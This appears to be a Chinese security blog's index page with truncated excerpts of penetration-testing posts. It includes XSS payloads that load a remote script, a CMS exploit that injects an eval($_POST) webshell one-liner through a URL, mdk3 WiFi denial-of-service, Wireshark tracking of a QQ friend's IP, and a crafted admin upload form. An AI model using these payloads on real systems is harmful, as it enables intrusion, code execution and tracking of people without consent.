869天 南柯一梦

忠于理想 面对现实

Xshell是一个强大的安全终端模拟软件,它支持SSH1, SSH2, 以及Microsoft Windows 平台的TELNET 协议。Xshell 通过互联网到远程主机的安全连接以及它创新性的设计和特色帮助用户在复杂的网络环境中享受他们的工作。

(1)普通的XSSJavaScript注入 <SCRIPTSRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPTSRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号 <IMGSRC=j...

1.介绍 验证码就是每次访问页面时随机生成的图片,内容一般是数字和字母(更BT点的有中文,现在已经升级到图片,动画等验证码),需要访问者把图中的数字字母填到表单中提交,这样就有效地防止了暴力破解。验证码也用于防止恶意灌水、广告帖等。在登陆的地方访问一个脚本文件,该文件生成含验证码的图片并将值写入到session里,提交的时候验证登陆的脚本就会判断提交的验证码是否与session里的一致...

BurpSuite是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,包含了Proxy,Spider,Scanner,Intruder,Repeater,Sequencer,Decoder,Comparer等工具模块。通过拦截HTTP/HTTPS的web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是web安全人员的一把必备的瑞...

BurpSuite是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,包含了Proxy,Spider,Scanner,Intruder,Repeater,Sequencer,Decoder,Comparer等工具模块。通过拦截HTTP/HTTPS的web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是web安全人员的一把必备的瑞...

安装VmwareTools tar zxvf VMwareTools-sfsfsfasfasfsaf #解压安装包 cd 到解压后的安装目录 ./ 绿色的可执行文件 #进行安装 # 等待安装结束,期间根据提示进行y/n确定 reboot # 重启Kali Kali系统更新及替换国内软件源 leafpad /etc/apt/sources.list 注释掉官方的更新源 复制国...

测试版本:易酷CMS2.5 包含一句话:http://localhost/?s=my/show/id/{~eval($_POST[x])} 会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日 错误日志内容为 包含错误日志地址:http://localhost/?s=my/show/id/...

Kali Linux 集成了许多安全测试工具 例如WiFi攻击工具 :mdk3 ,reaver 等等 有的软件可以暴力 破解WiFi密码,有的则可以小规模让WiFi瘫痪 (对了前提是你拥有一个免驱动的无线网卡,某宝就有售而且很便宜) 今天要讲的是mdk3 实现大菠萝wifi功能 生成死亡AP 这款工具暴力而且方便使用 ...

    虽然网上已经有了很多获取IP的QQ插件,但是其原理大致都是相同的,但是插件的安全性而言就不敢恭维了,下面介绍如何利用WireShark获取好友IP。  一、打开WireShark选择本机网卡,由于我本机使用的是无线网卡,所以选择第三个; 二、双击点击后将会看到大量的流量数据包传送,如下图...

一、首先打开官网下载一套程序 二、登录到后台 三、本地构造一个上传页面 POST参数 Submit,File 代码如下: <html> <body> <form action="http://localhost/admin/index.php?c=uploadfil...